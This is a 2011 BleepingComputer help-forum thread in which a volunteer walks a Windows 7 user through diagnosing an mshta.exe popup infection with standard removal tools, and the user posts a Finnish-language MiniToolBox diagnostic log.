Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Constant popups appearing, likely from mshta.exe


  • Please log in to reply
19 replies to this topic

#1 DaFe

DaFe

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:05:38 AM

Posted 04 August 2011 - 04:13 PM

Hi!

Just earlier tonight, being the impatient idiot I am and trusting my antivirus software too much, I let IE open a page with WindowsMediaPlayer.hta file that my firefox couldn't handle. It proceeded to to open windows mediaplayer which I rarely use, and additionally gave me a nice popup in Japanese. While I can close the popup (it's not a regular IE/Firefox window), it always returns in but few seconds.

Checking the process it's connected to in process manager gives me mshta.exe *32, which is located in C:\Windows\SysWOW64. A quick googling tells me that this file should be in a different folder and that I likely have an infection of sorts. Also saw some reports of this being related to tasks having been generated for windows, and checking my current tasks does return me 2 tasks being ran today - GoogleUpdateTaskMachineCore and GoogleUpdateTaskMachineUA. As far as I know I have no google software installed that would require these, so they seem to be part of the problem. As I also saw multitude of troijan reports in combination with this problem, I figured it's best I do nothing before I get some good advice. Thus, here I am.

What I've done so far:
Ran my anti-virus software's full check (f-secure client security), which found but one tracking cookie. Problem still persist.

I'm running 64bit windows 7.

How should I proceed in fixing this problem? So far I haven't even dared to restart my computer in fear of worsening the situation.

Thank you for your help in advance,
DaFe

BC AdBot (Login to Remove)

 


#2 jntkwx

jntkwx

  • Malware Response Team
  • 4,339 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:New England, U.S.A.
  • Local time:11:38 PM

Posted 04 August 2011 - 06:59 PM

Hi DaFe,

:welcome: to Bleeping Computer.

My name is Jason and I'll be helping you with your computer problems. You can call me by my screename jntkwx or Jason is fine.

Some things to remember while we are working together.

  • Do not run any other tool untill instructed to do so!
  • Please do not attach logs or put logs in code boxes.
  • Tell me about any problems that have occurred during the fix.
  • Tell me of any other symptoms you may be having as these can also help.
  • Do not run anything while running a fix.
  • If you don't understand a step, please ask for clarification before continuing with any future steps.

Click on the Watch Topic button and select Immediate Notification and click on proceed, this will help you to get notified faster when I have replied and make the cleaning process faster.

Note to others: The instructions here are intended for the person who began this topic. If you need help, please create your own topic in the appropriate forum.

 

:step1: Please download MiniToolBox and run it.

Checkmark following boxes:
  • Report IE Proxy Settings
  • Report FF Proxy Settings
  • List content of Hosts
  • List IP configuration
  • List last 10 Event Viewer Log Errors
  • List Installed Programs
  • List Users, Partitions and Memory size
Click Go . Please put code boxes around just this entire log, like this, but without the letter x: [xcode] MiniToolBox log [/xcode]

:step2: Please download Malwarebytes Anti-Malware and save it to your desktop.
Download Link 1
Download Link 2MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.
  • Make sure you are connected to the Internet.
  • Double-click on mbam-setup.exe to install the application.
    For instructions with screenshots, please refer to the How to use Malwarebytes' Anti-Malware Guide.
  • When the installation begins, follow the prompts and do not make any changes to default settings.
  • When installation has finished, make sure you leave both of these checked:
    • Update Malwarebytes' Anti-Malware
    • Launch Malwarebytes' Anti-Malware
  • Then click Finish.
MBAM will automatically start and you will be asked to update the program before performing a scan.
  • If an update is found, the program will automatically update itself. Press the OK button to close that box and continue.
  • If you encounter any problems while downloading the definition updates, manually download them from here and just double-click on mbam-rules.exe to install.
On the Scanner tab:
  • Make sure the "Perform Quick Scan" option is selected.
  • Then click on the Scan button.
  • If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button.
  • The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.
  • When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results' to display all objects found".
  • Click OK to close the message box and continue with the removal process.
Back at the main Scanner screen:
  • Click on the Show Results button to see a list of any malware that was found.
  • Make sure that everything is checked, and click Remove Selected.
  • When removal is completed, a log report will open in Notepad.
  • The log is automatically saved and can be viewed by clicking the Logs tab in MBAM.
  • Copy and paste the contents of that report in your next reply. Be sure to post the complete log to include the top portion which shows MBAM's database version and your operating system.
  • Exit MBAM when done.
Note: If MBAM encounters a file that is difficult to remove, you will be asked to reboot your computer so MBAM can proceed with the disinfection process. If asked to restart the computer, please do so immediately. Failure to reboot normally (not into safe mode) will prevent MBAM from removing all the malware.

Troubleshoot Malwarebytes' Anti-Malware

:step3: Superantisypware (SAS):

Download and scan with SUPERAntiSpyware Free for Home Users
  • Double-click SUPERAntiSpyware.exe and use the default settings for installation.
  • An icon will be created on your desktop. Double-click that icon to launch the program.
  • If asked to update the program definitions, click "Yes". If not, update the definitions before scanning by selecting "Check for Updates". (If you encounter any problems while downloading the updates, manually download them from http://www.superantispyware.com/downloads/SASDEFINITIONS.EXE (copy and paste that website address) and save SASDEFINITIONS.EXE to your desktop. Then double-click on SASDEFINITIONS.EXE to install the definitions.)
  • In the Main Menu, click the Preferences... button.
  • Click the Scanning Control tab.
  • Under Scanner Options make sure the following are checked (leave all others checked):
    • Close browsers before scanning.
    • Scan for tracking cookies.
    • Terminate memory threats before quarantining.
  • Click the "Home" button to leave the control center screen.
  • Back on the main screen, under "Select Scan Type" click Complete Scan.
  • On the left, make sure you check C:\.
  • Click Start Complete Scan > Please be patient while it scans your computer.
  • After the scan is complete, a Scan Summary box will appear with potentially harmful items that were detected. Click "OK".
  • Make sure everything has a checkmark next to it and click "Next".
  • A notification will appear that "Quarantine and Removal is Complete". Click "OK" and then click the "Finish" button to return to the main menu.
  • If asked if you want to reboot, click "Yes".
  • To retrieve the removal information after reboot, launch SUPERAntispyware again.
    • Click Preferences, then click the Statistics/Logs tab.
    • Under Scanner Logs, double-click SUPERAntiSpyware Scan Log.
    • If there are several logs, click the current dated log and press View log. A text file will open in your default text editor.
    • Please copy and paste the Scan Log results in your next reply.
  • Click Close to exit the program.
If you have a problem downloading, installing or getting SAS to run, try downloading and using the SUPERAntiSpyware Portable Scanner instead. Save the randomly named file (i.e. SAS_1710895.COM) to a USB drive or CD and transfer to the infected computer. Then double-click on it to launch and scan. The file is randomly named to help keep malware from blocking the scanner.

:step4: Please download GMER from one of the following locations and save it to your desktop:
  • Main Mirror
    This version will download a randomly named file (Recommended)
  • Zipped Mirror
    This version will download a zip file you will need to extract first. If you use this mirror, please extract the zip file to your desktop.
  • Disconnect from the Internet and close all running programs.
  • Temporarily disable any real-time active protection so your security programs will not conflict with gmer's driver.
  • Double-click on the randomly named GMER file (i.e. n7gmo46c.exe) and allow the gmer.sys driver to load if asked.
  • Note: If you downloaded the zipped version, extract the file to its own folder such as C:\gmer and then double-click on gmer.exe.

    Posted Image
  • GMER will open to the Rootkit/Malware tab and perform an automatic quick scan when first run. (do not use the computer while the scan is in progress)
  • If you receive a WARNING!!! about rootkit activity and are asked to fully scan your system...click NO.
  • Now click the Scan button. If you see a rootkit warning window, click OK.
  • When the scan is finished, click the Save... button to save the scan results to your Desktop. Save the file as gmer.log.
  • Click the Copy button and paste the results into your next reply.
  • Exit GMER and be sure to re-enable your anti-virus, Firewall and any other security programs you had disabled.

IMPORTANT! If for some reason GMER refuses to run, try again.
If it still fails, try to UN-check "Devices" in right pane.
If still no joy, try to run it from Safe Mode.

:step5: Please download SystemLook from one of the links below and save it to your Desktop.
  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    :filefind
    mshta.exe /md5
    
    :dir
    %windir%\system32 /t5
    %windir%\syswow64 /t5
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt


In your next repy, please include:
  • MiniToolBox log
  • Malwarebytes log
  • SUPERAntiSpyware log
  • GMER log
  • SystemLook log
  • How's your computer running now?

Edited by jntkwx, 04 August 2011 - 07:00 PM.

Regards,
Jason

 

Simple and easy ways to keep your computer safe and secure on the Internet

If I am helping you and have not returned in 48 hours, please feel free to send me a PM with a link to the topic.
My help is free... however, if you wish to show appreciation and support me personally fighting against malware, please consider a donation: btn_donate_SM.gif


#3 DaFe

DaFe
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:05:38 AM

Posted 05 August 2011 - 12:05 PM

Hi, below are the logs you requested:

MiniToolBox by Farbar 
Ran by onoff (administrator) on 05-08-2011 at 16:36:09
Windows 7 Home Premium  (X64)

***************************************************************************

========================= IE Proxy Settings: ============================== 

Proxy is not enabled.
ProxyServer: 49.212.15.191:3128

========================= FF Proxy Settings: ============================== 

========================= Hosts content: =================================



========================= IP Configuration: ================================

# ----------------------------------
# IPv4-maaritys
# ----------------------------------
pushd interface ipv4

reset
set global icmpredirects=enabled


popd
# IPv4-kokoonpanon loppu.



Windows IP-maaritykset

        Isantanimi  . . . . . . . . . . . : onoff-PC
        Ensisijainen DNS-liite  . . . . . : 
        Solmutyyppi . . . . . . . . . . . : Hybridi
        IP-reititys kaytossa  . . . . . . : Ei
        WINS-valityspalvelin kaytossa . . : Ei
        DNS-liitteiden etsintaluettelo  . : dhcp.inet.fi

Ethernet-sovitin Lahiverkkoyhteys:

        Yhteyskohtainen DNS-liite . . . . : dhcp.inet.fi
        Kuvaus  . . . . . . . . . . . . . : Atheros AR8131 PCI-E Gigabit Ethernet Controller (NDIS 6.20)
        Fyysinen osoite . . . . . . . . . : 48-5B-39-39-7C-7F
        DHCP kaytossa . . . . . . . . . . : Kylla
        Automaattinen maaritys kaytossa . : Kylla
   Linkin paikallinen IPv6-osoite. . : fe80::a0b3:475e:94c5:1419%12(Ensisijainen) 
   IPv4-osoite . . . . . . . . . . . : 88.192.255.236(Ensisijainen) 
        Aliverkon peite . . . . . . . . . : 255.255.240.0
        Kayttolupa myonnetty  . . . . . . : 4. elokuuta 2011 20:19:31
        Kayttolupa vanhenee . . . . . . : 6. elokuuta 2011 2:34:32
        Oletusyhdyskaytava. . . . . . . . : 88.192.240.1
        DHCP-palvelin . . . . . . . . . . : 84.251.112.1
   DHCPv6-IAID . . . . . . . . . . . : 340286265
   DHCPv6-asiakkaan DUID-tunnus  . . : 00-01-00-01-13-40-EC-22-1C-4B-D6-55-F7-EC
        DNS-palvelimet  . . . . . . . . . : 192.89.123.231
                                            193.210.19.190
   NetBIOS TCP/IP:n paalla . . . . . : Kaytossa

Langattoman lahiverkon sovitin Langaton verkkoyhteys:

        Laitteen tila . . . . . . . . . . : Ei kytketty
        Yhteyskohtainen DNS-liite . . . . : TeleWell.gateway
        Kuvaus  . . . . . . . . . . . . . : Atheros AR9285 Wireless Network Adapter
        Fyysinen osoite . . . . . . . . . : 1C-4B-D6-55-F7-EC
        DHCP kaytossa . . . . . . . . . . : Kylla
        Automaattinen maaritys kaytossa . : Kylla

Tunnelisovitin isatap.TeleWell.gateway:

        Laitteen tila . . . . . . . . . . : Ei kytketty
        Yhteyskohtainen DNS-liite . . . . : 
        Kuvaus  . . . . . . . . . . . . . : Microsoft ISATAP -sovitin
        Fyysinen osoite . . . . . . . . . : 00-00-00-00-00-00-00-E0
        DHCP kaytossa . . . . . . . . . . : Ei
        Automaattinen maaritys kaytossa . : Kylla

Tunnelisovitin isatap.dhcp.inet.fi:

        Laitteen tila . . . . . . . . . . : Ei kytketty
        Yhteyskohtainen DNS-liite . . . . : dhcp.inet.fi
        Kuvaus  . . . . . . . . . . . . . : Microsoft ISATAP -sovitin #2
        Fyysinen osoite . . . . . . . . . : 00-00-00-00-00-00-00-E0
        DHCP kaytossa . . . . . . . . . . : Ei
        Automaattinen maaritys kaytossa . : Kylla

Tunnelisovitin 6TO4 Adapter:

        Yhteyskohtainen DNS-liite . . . . : dhcp.inet.fi
        Kuvaus  . . . . . . . . . . . . . : Microsoft 6to4 -sovitin
        Fyysinen osoite . . . . . . . . . : 00-00-00-00-00-00-00-E0
        DHCP kaytossa . . . . . . . . . . : Ei
        Automaattinen maaritys kaytossa . : Kylla
   IPv6-osoite . . . . . . . . . . . : 2002:58c0:ffec::58c0:ffec(Ensisijainen) 
        Oletusyhdyskaytava. . . . . . . . : 2002:c058:6301::c058:6301
        DNS-palvelimet  . . . . . . . . . : 192.89.123.231
                                            193.210.19.190
        NetBIOS TCP/IP:n paalla . . . . . : Ei kaytossa

Tunnelisovitin Teredo Tunneling Pseudo-Interface:

        Yhteyskohtainen DNS-liite . . . . : 
        Kuvaus  . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
        Fyysinen osoite . . . . . . . . . : 00-00-00-00-00-00-00-E0
        DHCP kaytossa . . . . . . . . . . : Ei
        Automaattinen maaritys kaytossa . : Kylla
   Linkin paikallinen IPv6-osoite. . : fe80::d:92a:a73f:13%15(Ensisijainen) 
        Oletusyhdyskaytava. . . . . . . . : 
   DHCPv6-IAID . . . . . . . . . . . : 452984832
   DHCPv6-asiakkaan DUID-tunnus  . . : 00-01-00-01-13-40-EC-22-1C-4B-D6-55-F7-EC
        NetBIOS TCP/IP:n paalla . . . . . : Ei kaytossa
Palvelin:  ns.inet.fi
Address:  192.89.123.231

Nimi:    google.com
Addresses:  209.85.148.99
	  209.85.148.103
	  209.85.148.104
	  209.85.148.105
	  209.85.148.106
	  209.85.148.147


Ping-isanta: google.com [209.85.148.147] 32 tavua tietoja:
Vastaus isannalta 209.85.148.147: tavuja=32 aika=41 ms TTL=54
Vastaus isannalta 209.85.148.147: tavuja=32 aika=42 ms TTL=54

Ping-tilastot 209.85.148.147:
    Paketit: Lahetetty = 2, Vastaanotettu = 2, Kadonnut = 0
             (0% havikki),
Arvioitu kiertoaika millisekunteina:
    Pienin = 41 ms, Suurin = 42 ms, Keskiarvo = 41 ms
Palvelin:  ns.inet.fi
Address:  192.89.123.231

Nimi:    yahoo.com
Addresses:  69.147.125.65
	  72.30.2.43
	  98.137.149.56
	  209.191.122.70
	  67.195.160.76


Ping-isanta: yahoo.com [209.191.122.70] 32 tavua tietoja:
Vastaus isannalta 209.191.122.70: tavuja=32 aika=157 ms TTL=52
Vastaus isannalta 209.191.122.70: tavuja=32 aika=156 ms TTL=52

Ping-tilastot 209.191.122.70:
    Paketit: Lahetetty = 2, Vastaanotettu = 2, Kadonnut = 0
             (0% havikki),
Arvioitu kiertoaika millisekunteina:
    Pienin = 156 ms, Suurin = 157 ms, Keskiarvo = 156 ms

Ping-isanta: 127.0.0.1 32 tavua tietoja:
Vastaus isannalta 127.0.0.1: tavuja=32 aika<1ms TTL=128
Vastaus isannalta 127.0.0.1: tavuja=32 aika<1ms TTL=128

Ping-tilastot 127.0.0.1:
    Paketit: Lahetetty = 2, Vastaanotettu = 2, Kadonnut = 0
             (0% havikki),
Arvioitu kiertoaika millisekunteina:
    Pienin = 0 ms, Suurin = 0 ms, Keskiarvo = 0 ms
===========================================================================
Sovitinluettelo
 12...48 5b 39 39 7c 7f ......Atheros AR8131 PCI-E Gigabit Ethernet Controller (NDIS 6.20)
 11...1c 4b d6 55 f7 ec ......Atheros AR9285 Wireless Network Adapter
  1...........................Software Loopback Interface 1
 17...00 00 00 00 00 00 00 e0 Microsoft ISATAP -sovitin
 16...00 00 00 00 00 00 00 e0 Microsoft ISATAP -sovitin #2
 19...00 00 00 00 00 00 00 e0 Microsoft 6to4 -sovitin
 15...00 00 00 00 00 00 00 e0 Teredo Tunneling Pseudo-Interface
===========================================================================

IPv4 -reititystaulukko
===========================================================================
Active Routes:
Verkkokohde        Verkon peite          Yhdyskaytava     Liittyma  Metric-arvo
          0.0.0.0          0.0.0.0     88.192.240.1   88.192.255.236     20
     88.192.240.0    255.255.240.0   Linkin maarittama    88.192.255.236    276
   88.192.255.236  255.255.255.255   Linkin maarittama    88.192.255.236    276
   88.192.255.255  255.255.255.255   Linkin maarittama    88.192.255.236    276
        127.0.0.0        255.0.0.0   Linkin maarittama         127.0.0.1    306
        127.0.0.1  255.255.255.255   Linkin maarittama         127.0.0.1    306
  127.255.255.255  255.255.255.255   Linkin maarittama         127.0.0.1    306
        224.0.0.0        240.0.0.0   Linkin maarittama         127.0.0.1    306
        224.0.0.0        240.0.0.0   Linkin maarittama    88.192.255.236    276
  255.255.255.255  255.255.255.255   Linkin maarittama         127.0.0.1    306
  255.255.255.255  255.255.255.255   Linkin maarittama    88.192.255.236    276
===========================================================================
Jatkuvat reitit:
  Ei mitaan

IPv6 -reititystaulukko
===========================================================================
Active Routes:
 Jos verkkokohde on Metric-kohdeyhdyskaytava
 19   1125 ::/0                     2002:c058:6301::c058:6301
  1    306 ::1/128                  Linkin maarittama
 19   1025 2002::/16                Linkin maarittama
 19    281 2002:58c0:ffec::58c0:ffec/128
                                    Linkin maarittama
 12    276 fe80::/64                Linkin maarittama
 15    306 fe80::/64                Linkin maarittama
 15    306 fe80::d:92a:a73f:13/128  Linkin maarittama
 12    276 fe80::a0b3:475e:94c5:1419/128
                                    Linkin maarittama
  1    306 ff00::/8                 Linkin maarittama
 15    306 ff00::/8                 Linkin maarittama
 12    276 ff00::/8                 Linkin maarittama
===========================================================================
Jatkuvat reitit:
  Ei mitaan

========================= Event log errors: ===============================

Application errors:
==================
Error: (08/05/2011 00:00:07 AM) (Source: FSecure-FSecure-F-Secure Anti-Virus) (User: )
Description: 1  2011-08-05  00:00:04+03:00  onoff-pc  ONOFF-PC\onoff  F-Secure Anti-Virus
 Manual scanning was finished - spyware was found in the system.

Error: (07/30/2011 07:24:33 PM) (Source: Application Error) (User: )
Description: Viallisen sovelluksen nimi: OfficeLiveSignIn.exe, versio: 2.0.2313.0, aikaleima: 0x491c0a79
Viallisen moduulin nimi: OfficeLiveSignIn.exe, versio: 2.0.2313.0, aikaleima: 0x491c0a79
Poikkeuskoodi: 0xc0000005
Virhepoikkeama: 0x00003ce7
Viallisen prosessin tunnus: 0x2b60
Viallisen sovelluksen kaynnistysaika: 0xOfficeLiveSignIn.exe0
Viallisen sovelluksen polku: OfficeLiveSignIn.exe1
Viallisen moduulin polku: OfficeLiveSignIn.exe2
Raportin tunnus: OfficeLiveSignIn.exe3

Error: (07/17/2011 04:18:14 PM) (Source: Application Error) (User: )
Description: Viallisen sovelluksen nimi: OfficeLiveSignIn.exe, versio: 2.0.2313.0, aikaleima: 0x491c0a79
Viallisen moduulin nimi: OfficeLiveSignIn.exe, versio: 2.0.2313.0, aikaleima: 0x491c0a79
Poikkeuskoodi: 0xc0000005
Virhepoikkeama: 0x00003ce7
Viallisen prosessin tunnus: 0xe894
Viallisen sovelluksen kaynnistysaika: 0xOfficeLiveSignIn.exe0
Viallisen sovelluksen polku: OfficeLiveSignIn.exe1
Viallisen moduulin polku: OfficeLiveSignIn.exe2
Raportin tunnus: OfficeLiveSignIn.exe3

Error: (07/13/2011 11:13:23 PM) (Source: Application Error) (User: )
Description: Viallisen sovelluksen nimi: OfficeLiveSignIn.exe, versio: 2.0.2313.0, aikaleima: 0x491c0a79
Viallisen moduulin nimi: OfficeLiveSignIn.exe, versio: 2.0.2313.0, aikaleima: 0x491c0a79
Poikkeuskoodi: 0xc0000005
Virhepoikkeama: 0x00003ce7
Viallisen prosessin tunnus: 0x5258
Viallisen sovelluksen kaynnistysaika: 0xOfficeLiveSignIn.exe0
Viallisen sovelluksen polku: OfficeLiveSignIn.exe1
Viallisen moduulin polku: OfficeLiveSignIn.exe2
Raportin tunnus: OfficeLiveSignIn.exe3

Error: (07/09/2011 04:14:37 AM) (Source: SideBySide) (User: )
Description: Aktivointikontekstin luonti epaonnistui (1). Virhe luettelo- tai kaytantotiedoston 2 rivilla 3.
XML-syntaksi ei kelpaa.

Error: (07/09/2011 04:14:37 AM) (Source: SideBySide) (User: )
Description: Aktivointikontekstin luonti epaonnistui (1). Virhe luettelo- tai kaytantotiedoston 2 rivilla 3.
XML-syntaksi ei kelpaa.

Error: (07/09/2011 04:13:31 AM) (Source: SideBySide) (User: )
Description: Aktivointikontekstin luonti epaonnistui (assemblyIdentity1). Virhe luettelo- tai kaytantotiedoston assemblyIdentity2 rivilla assemblyIdentity3.
Maaritteen version arvo (MAJOR_VERSION.MINOR_VERSION.BUILD_NUMBER_MAJOR.BUILD_NUMBER_MINOR) ei kelpaa elementissa assemblyIdentity.

Error: (07/09/2011 03:13:08 AM) (Source: SideBySide) (User: )
Description: Aktivointikontekstin luonti epaonnistui (assemblyIdentity1). Virhe luettelo- tai kaytantotiedoston assemblyIdentity2 rivilla assemblyIdentity3.
Maaritteen version arvo (MAJOR_VERSION.MINOR_VERSION.BUILD_NUMBER_MAJOR.BUILD_NUMBER_MINOR) ei kelpaa elementissa assemblyIdentity.

Error: (07/03/2011 08:29:04 AM) (Source: FSecure-FSecure-F-Secure Anti-Virus) (User: )
Description: 1  2011-07-03  08:28:21+03:00  onoff-pc  onoff-PC\onoff  F-Secure Anti-Virus
 An error occurred while scanning \DEVICE\HARDDISKVOLUME2\WINDOWS\SERVICEPROFILES\LOCALSERVICE\APPDATA\ROAMING\PEERNETWORKING\093AF2A2EC3ABB4539E32ABCBAD6164C99A95A53.HOMEGROUPCLASSIFIER\5D26D5CBDF1AEF5C80BF2730EB5F5EAB\GROUPING\DB.MDB.

Error: (06/02/2011 00:13:36 AM) (Source: SideBySide) (User: )
Description: Aktivointikontekstin luonti epaonnistui (1). Virhe luettelo- tai kaytantotiedoston 2 rivilla 3.
XML-syntaksi ei kelpaa.


System errors:
=============
Error: (08/04/2011 08:18:55 PM) (Source: Service Control Manager) (User: )
Description: Aikakatkaisu (30000 millisekuntia) odotettaessa tapahtuman vastausta Wlansvc-palvelusta.

Error: (08/04/2011 09:51:54 AM) (Source: Service Control Manager) (User: )
Description: Aikakatkaisu (30000 millisekuntia) odotettaessa tapahtuman vastausta Netman-palvelusta.

Error: (07/30/2011 08:17:53 PM) (Source: EventLog) (User: )
Description: Edellinen jarjestelman sammutus (20:11:34, ?30.?7.?2011) oli odottamaton.

Error: (07/28/2011 08:14:16 PM) (Source: Service Control Manager) (User: )
Description: Aikakatkaisu (30000 millisekuntia) odotettaessa tapahtuman vastausta ShellHWDetection-palvelusta.

Error: (07/27/2011 08:33:55 AM) (Source: Service Control Manager) (User: )
Description: Aikakatkaisu (30000 millisekuntia) odotettaessa tapahtuman vastausta ShellHWDetection-palvelusta.

Error: (07/26/2011 10:04:43 PM) (Source: Disk) (User: )
Description: Ohjain havaitsi korttivirheen laitteella \Device\Harddisk1\DR7.

Error: (07/26/2011 10:04:42 PM) (Source: Disk) (User: )
Description: Ohjain havaitsi korttivirheen laitteella \Device\Harddisk1\DR7.

Error: (07/26/2011 10:04:42 PM) (Source: Disk) (User: )
Description: Ohjain havaitsi korttivirheen laitteella \Device\Harddisk1\DR7.

Error: (07/26/2011 10:04:41 PM) (Source: Disk) (User: )
Description: Ohjain havaitsi korttivirheen laitteella \Device\Harddisk1\DR7.

Error: (07/26/2011 10:04:41 PM) (Source: Disk) (User: )
Description: Ohjain havaitsi korttivirheen laitteella \Device\Harddisk1\DR7.


Microsoft Office Sessions:
=========================

=========================== Installed Programs ============================


7-Zip 9.20
Acrobat.com (Version: 1.6.65)
Adobe AIR (Version: 1.5.0.7220)
Adobe Flash Player 10 ActiveX (Version: 10.0.32.18)
Adobe Flash Player 10 Plugin (Version: 10.0.32.18)
Adobe Reader 9.2 MUI (Version: 9.2.0)
Alcor Micro USB Card Reader (Version: 1.5.17.25482)
Alice Greenfingers
Anki
ASUS AI Recovery (Version: 1.0.8)
ASUS AP Bank (Version: 1.0.0.0)
ASUS FancyStart (Version: 1.0.8)
ASUS LifeFrame3 (Version: 3.0.20)
ASUS Live Update (Version: 2.5.9)
ASUS MultiFrame (Version: 1.0.0021)
ASUS Power4Gear Hybrid (Version: 1.1.29)
ASUS SmartLogon (Version: 1.0.0007)
ASUS WebStorage (Version: 2.0.40.1319)
ASUS Virtual Camera (Version: 1.0.19)
ASUS_UL_Series_Screensaver
ATK Generic Function Service (Version: 1.00.0008)
ATK Hotkey (Version: 1.0.0053)
ATK Media (Version: 2.0.0006)
ATKOSD2 (Version: 7.0.0007)
Chicken Invaders 2
Combined Community Codec Pack 2010-10-10 (Version: 2010.10.10.0)
ControlDeck (Version: 1.0.5)
CoreAVC Professional Edition (remove only)
CyberLink LabelPrint (Version: 2.5.1908)
CyberLink Power2Go (Version: 6.1.3509a)
DAEMON Tools Lite (Version: 4.40.1.0127)
Dream Day Wedding Married in Manhattan
ETDWare PS/2-x64 7.0.5.9_WHQL
Express Gate (Version: 1.2.13.40)
F-Secure Client Security - DeepGuard
F-Secure Client Security - Internet-suojaus
F-Secure Client Security - Sahkopostin tarkistus
F-Secure Client Security - Selaussuojaus
F-Secure Client Security - Web-liikenteen tarkistus
F-Secure Client Security - Virus- ja vakoilusuojaus
Fast Boot (Version: 1.0.5)
G-Senjou no Maou English (Version: 1.0.0.716)
Game Park Console (Version: 6.2.0.2)
Google Chrome (Version: 13.0.782.107)
Google Toolbar for Internet Explorer (Version: 1.0.0)
Google Update Helper (Version: 1.3.21.65)
Haali Media Splitter
Java Auto Updater (Version: 2.0.3.1)
Java(TM) 6 Update 24 (Version: 6.0.240)
Junk Mail filter update (Version: 14.0.8117.416)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319)
Microsoft .NET Framework 4 Client Profile FIN Language Pack (Version: 4.0.30319)
Microsoft .NET Framework 4 Client Profilen suomen kielipaketti (Version: 4.0.30319)
Microsoft Application Error Reporting (Version: 12.0.6015.5000)
Microsoft Office Access MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Access MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Access Setup Metadata MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Enterprise 2007 (Version: 12.0.4518.1014)
Microsoft Office Excel MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Excel MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Groove MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Groove MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Groove Setup Metadata MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office InfoPath MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office InfoPath MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Language Pack 2007 - Finnish/suomi (Version: 12.0.4518.1021)
Microsoft Office Live Add-in 1.3 (Version: 2.0.2313.0)
Microsoft Office O MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Office 64-bit Components 2007 (Version: 12.0.4518.1014)
Microsoft Office OneNote MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office OneNote MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Outlook MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Outlook MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office PowerPoint MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Proof (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Proof (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Proof (French) 2007 (Version: 12.0.4518.1014)
Microsoft Office Proof (German) 2007 (Version: 12.0.4518.1014)
Microsoft Office Proof (Spanish) 2007 (Version: 12.0.4518.1014)
Microsoft Office Proof (Swedish) 2007 (Version: 12.0.4518.1020)
Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Proofing (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Publisher MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Publisher MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Shared 64-bit MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Shared 64-bit MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Shared MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Shared MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office SharePoint Designer MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Word MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Word MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office X MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Search Enhancement Pack (Version: 3.0.133.0)
Microsoft Silverlight (Version: 4.0.50401.0)
Microsoft Tallenna PDF- tai XPS-muodossa -apuohjelma 2007 Microsoft Office -ohjelmiin (Version: 12.0.4518.1021)
Microsoft Visual C++ 2005 Redistributable - KB2467175 (Version: 8.0.51011)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (Version: 9.0.30729.4148)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (Version: 9.0.21022)
mIRC (Version: 7.19)
Mobile Partner (Version: 11.002.03.01.260)
Mozilla Firefox 5.0 (x86 fi) (Version: 5.0)
MSVCRT (Version: 14.0.1468.721)
MSXML 4.0 SP3 Parser (KB973685) (Version: 4.30.2107.0)
NVIDIA Drivers (Version: 1.3)
OpenOffice.org 3.2 (Version: 3.2.9502)
Piggly FREE
Real Alternative 2.0.2 (Version: 2.0.2)
Realtek High Definition Audio Driver (Version: 6.0.1.5958)
Smileyville FREE
SRS Premium Sound Control Panel (Version: 1.8.1700)
USB 2.0 UVC 0.3M WebCam
WIDCOMM Bluetooth Software (Version: 6.2.5.500)
